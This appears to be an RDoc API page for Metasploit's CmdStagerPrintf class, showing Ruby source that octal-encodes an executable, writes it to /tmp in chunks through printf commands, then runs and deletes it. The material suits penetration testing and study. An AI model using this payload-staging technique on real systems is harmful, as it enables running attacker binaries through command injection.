class Rex::Exploitation::CmdStagerPrintf

Public Class Methods

new(exe) click to toggle source
Calls superclass method Rex::Exploitation::CmdStagerBase::new
# File lib/rex/exploitation/cmdstager/printf.rb, line 12
def initialize(exe)
  super

  @var_elf = Rex::Text.rand_text_alpha(5)
end

Public Instance Methods

cmd_concat_operator() click to toggle source
# File lib/rex/exploitation/cmdstager/printf.rb, line 115
def cmd_concat_operator
  " ; "
end
encode_payload(opts) click to toggle source

Encode into a “12345” octal format that printf understands

# File lib/rex/exploitation/cmdstager/printf.rb, line 57
def encode_payload(opts)
  return Rex::Text.to_octal(@exe, @prefix)
end
generate(opts = {}) click to toggle source

Override to ensure opts is a correct *nix path

# File lib/rex/exploitation/cmdstager/printf.rb, line 21
def generate(opts = {})
  opts[:temp] = opts[:temp] || '/tmp/'
  opts[:temp].gsub!(/\\/, '/')
  opts[:temp] = opts[:temp].shellescape
  opts[:temp] << '/' if opts[:temp][-1,1] != '/'
  super
end
generate_cmds(opts) click to toggle source

Override to set the extra byte count

# File lib/rex/exploitation/cmdstager/printf.rb, line 32
def generate_cmds(opts)
  if opts[:noquotes]
    @cmd_start    = "printf "
    @cmd_end      = ">>#{@tempdir}#{@var_elf}"
    @prefix       = '\\\\'
    min_part_size = 5
  else
    @cmd_start    = "printf '"
    @cmd_end      = "'>>#{@tempdir}#{@var_elf}"
    @prefix       = '\\'
    min_part_size = 4
  end
  xtra_len = @cmd_start.length + @cmd_end.length
  opts.merge!({ :extra => xtra_len })

  if (opts[:linemax] - opts[:extra]) < min_part_size
    raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
  end

  super
end
generate_cmds_decoder(opts) click to toggle source

Since the binary has been already dropped to disk, just execute and delete it

# File lib/rex/exploitation/cmdstager/printf.rb, line 101
def generate_cmds_decoder(opts)
  cmds = []
  # Make it all happen
  cmds << "chmod +x #{@tempdir}#{@var_elf}"
  cmds << "#{@tempdir}#{@var_elf}"

  # Clean up after unless requested not to..
  unless opts[:nodelete]
    cmds << "rm -f #{@tempdir}#{@var_elf}"
  end

  return cmds
end
parts_to_commands(parts, opts) click to toggle source

Combine the parts of the encoded file with the stuff that goes before and after it.

# File lib/rex/exploitation/cmdstager/printf.rb, line 91
def parts_to_commands(parts, opts)
  parts.map do |p|
    @cmd_start + p + @cmd_end
  end
end
slice_up_payload(encoded, opts) click to toggle source

Override it to ensure that the octal representation of a byte isn't cut

# File lib/rex/exploitation/cmdstager/printf.rb, line 64
def slice_up_payload(encoded, opts)
  encoded_dup = encoded.dup

  parts = []
  xtra_len = opts[:extra]
  xtra_len ||= 0
  while (encoded_dup.length > 0)
    temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))

    # remove the last octal escape if it is imcomplete
    if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
      pos = temp.rindex('\\')
      pos -= 1 if temp[pos-1] == '\\'
      temp.slice!(pos..temp.length-1)
    end

    parts << temp
    encoded_dup.slice!(0, temp.length)
  end

  parts
end